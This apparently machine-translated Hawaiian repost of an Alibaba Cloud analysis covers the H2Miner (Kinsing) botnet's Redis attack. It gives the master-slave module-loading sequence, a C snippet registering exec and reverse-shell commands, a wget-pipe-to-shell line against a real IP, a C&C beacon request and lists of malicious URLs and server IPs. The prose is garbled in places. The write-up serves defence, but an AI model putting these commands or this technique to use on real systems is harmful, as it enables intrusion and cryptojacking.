I kekahi lā i hala aku nei, ua hoʻouka ʻia kekahi o nā kikowaena o kaʻu papahana e kahi ilo like. I ka ʻimi ʻana i kahi pane i ka nīnau "he aha kēlā?" Ua loaʻa iaʻu kahi ʻatikala maikaʻi loa e ka hui Alibaba Cloud Security. No ka mea ʻaʻole i loaʻa iaʻu kēia ʻatikala ma Habré, ua hoʻoholo wau e unuhi pono iā ʻoe <3
komo
ʻO ka mea i hala koke aku nei, ua ʻike ka hui palekana ʻo Alibaba Cloud i kahi hoʻolaha koke o H2Miner. Ke hoʻohana nei kēia ʻano ʻino ʻino i ka nele o ka ʻae a i ʻole nā ʻōlelo huna nāwaliwali no Redis ma ke ʻano he puka i kāu mau ʻōnaehana, a laila hoʻonohonoho ʻo ia i kāna module ponoʻī me ke kauā ma o ka haku-kauā synchronization a hope loa hoʻoiho i kēia module ʻino i ka mīkini hoʻouka ʻia a hoʻokō i ka hewa. kuhikuhi.
I ka wā ma mua, ua hana mua ʻia nā hoʻouka ʻana i kāu mau ʻōnaehana me ka hoʻohana ʻana i kahi ala e pili ana i nā hana i hoʻonohonoho ʻia a i ʻole nā kī SSH i kākau ʻia i kāu mīkini ma hope o ke komo ʻana o ka mea hoʻouka iā Redis. ʻO ka mea pōmaikaʻi, ʻaʻole hiki ke hoʻohana pinepine ʻia kēia ʻano ma muli o nā pilikia me ka mana ʻae a i ʻole ma muli o nā ʻano ʻōnaehana like ʻole. Eia nō naʻe, hiki i kēia ʻano o ka hoʻouka ʻana i kahi module ʻino ke hoʻokō pololei i nā kauoha a ka mea hoʻouka a i ʻole ke komo ʻana i ka pūpū, he mea weliweli ia no kāu ʻōnaehana.
Ma muli o ka nui o nā kikowaena Redis i mālama ʻia ma ka Pūnaewele (kokoke i 1 miliona), ʻo ka hui palekana ʻo Alibaba Cloud, ma ke ʻano he hoʻomanaʻo hoʻomanaʻo, ʻōlelo ʻia ʻaʻole nā mea hoʻohana e kaʻana like iā Redis ma ka pūnaewele a nānā mau i ka ikaika o kā lākou mau ʻōlelo huna a inā ua hoʻohālikelike ʻia lākou. koho wikiwiki.
H2Miner
ʻO H2Miner kahi botnet mining no nā ʻōnaehana Linux e hiki ke hoʻouka i kāu ʻōnaehana ma nā ʻano like ʻole, me ka nele o ka ʻae ʻia ma Hadoop yarn, Docker, a me Redis remote command execution (RCE) vulnerabilities. Hana ʻia kahi botnet ma o ka hoʻoiho ʻana i nā palapala hōʻino a me nā polokalamu ʻino e loaʻa i kāu ʻikepili, hoʻonui i ka hoʻouka ʻana ma ke ākea, a mālama i nā kamaʻilio kauoha a me ka mana (C&C).
Redis RCE
Ua haʻi ʻia ka ʻike e pili ana i kēia kumuhana e Pavel Toporkov ma ZeroNights 2018. Ma hope o ka version 4.0, kākoʻo ʻo Redis i kahi hiʻohiʻona hoʻouka plug-in e hāʻawi i nā mea hoʻohana i ka hiki ke hoʻouka i nā faila i hui pū ʻia me C i Redis e hoʻokō i nā kauoha Redis kikoʻī. ʻO kēia hana, ʻoiai he pono, loaʻa kahi nāwaliwali kahi, ma ke ʻano master-slave, hiki ke hoʻonohonoho ʻia nā faila me ke kauā ma ke ʻano fullresync. Hiki ke hoʻohana ʻia kēia e ka mea hoʻouka e hoʻoili i nā faila hewa. Ma hope o ka pau ʻana o ka hoʻoili ʻana, hoʻouka ka poʻe hoʻouka i ka module ma luna o ka mea i hoʻouka ʻia ʻo Redis a hoʻokō i kekahi kauoha.
ʻIkepili ʻino ʻino
I kēia mau lā, ua ʻike ka hui palekana ʻo Alibaba Cloud ua piʻi koke ka nui o ka hui miner malicious H2Miner. E like me ka nānā ʻana, ʻo ke kaʻina maʻamau o ka hoʻouka kaua ʻana penei:
Hoʻohana ʻo H2Miner iā RCE Redis no kahi hoʻouka kaua piha. Hoʻouka mua nā mea hoʻouka i nā kikowaena Redis i pale ʻole ʻia a i ʻole nā kauā me nā ʻōlelo huna nāwaliwali.
A laila hoʻohana lākou i ke kauoha config set dbfilename red2.so e hoʻololi i ka inoa faila. Ma hope o kēia, hoʻokō nā mea hoʻouka i ke kauoha slaveof e hoʻonohonoho i ka helu wahi hoʻokipa haku-kauā.
Ke hoʻokumu nei ka mea hoʻouka ʻia ʻo Redis i kahi pilina haku-kauā me ka Redis hewa nona ka mea hoʻouka, hoʻouna ka mea hoʻouka i ka module maʻi me ka hoʻohana ʻana i ke kauoha fullresync e synchronize i nā faila. A laila e hoʻoiho ʻia ka faila red2.so i ka mīkini hoʻouka ʻia. A laila hoʻohana nā mea hoʻouka i ka ./red2.so loading module e hoʻouka i kēia faila. Hiki i ka module ke hoʻokō i nā kauoha mai ka mea hoʻouka a i ʻole ke hoʻomaka ʻana i kahi pilina hope (puka hope) e loaʻa ai ke komo i ka mīkini hoʻouka ʻia.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Ma hope o ka hoʻokō ʻana i kahi kauoha ʻino e like me / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, e hoʻihoʻi ka mea hoʻouka i ka inoa file backup a wehe i ka module system e hoʻomaʻemaʻe i nā ʻano. Eia naʻe, e mau ana ka faila red2.so ma ka mīkini i hoʻouka ʻia. Manaʻo ʻia nā mea hoʻohana e hoʻolohe i ka loaʻa ʻana o kahi faila kānalua i ka waihona o kā lākou Redis instance.
Ma waho aʻe o ka pepehi ʻana i kekahi mau kaʻina hana ʻino e ʻaihue i nā kumuwaiwai, ua hahai ka mea hoʻouka i kahi palapala hōʻino ma o ka hoʻoiho ʻana a me ka hoʻokō ʻana i nā faila binary maikaʻi ʻole. . ʻO ia ke ʻano o ka inoa kaʻina a i ʻole ka inoa papa kuhikuhi i loaʻa ka kinsing ma ka mea hoʻokipa e hōʻike paha ua loaʻa kēlā mīkini i kēia maʻi.
Wahi a nā hopena ʻenekinia hoʻohuli, hana nui ka malware i kēia mau hana:
- Hoʻouka i nā faila a hoʻokō iā lākou
- Hoʻouku
- Ka mālama ʻana i ke kamaʻilio C&C a me ka hoʻokō ʻana i nā kauoha hoʻouka kaua
E hoʻohana i ka masscan no ka nānā ʻana i waho e hoʻonui i kou mana. Eia kekahi, ua paʻakikī ka helu IP o ka server C&C i ka papahana, a e kamaʻilio ka mea hoʻouka kaua me ke kikowaena kamaʻilio C&C me ka hoʻohana ʻana i nā noi HTTP, kahi i ʻike ʻia ai ka ʻike zombie (served server) ma ke poʻo HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Nā ʻano hoʻouka kaua ʻē aʻe
Nā helu wahi a me nā loulou i hoʻohana ʻia e ka ilo
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Hoʻopuka
ʻO ka mea mua, ʻaʻole hiki ke loaʻa iā Redis mai ka Pūnaewele a pono e pale ʻia me kahi ʻōlelo huna ikaika. He mea nui hoʻi e nānā nā mea kūʻai aku ʻaʻohe faila red2.so i ka papa kuhikuhi Redis a ʻaʻohe "kinsing" i ka inoa file / kaʻina hana ma ka host.
Source: www.habr.com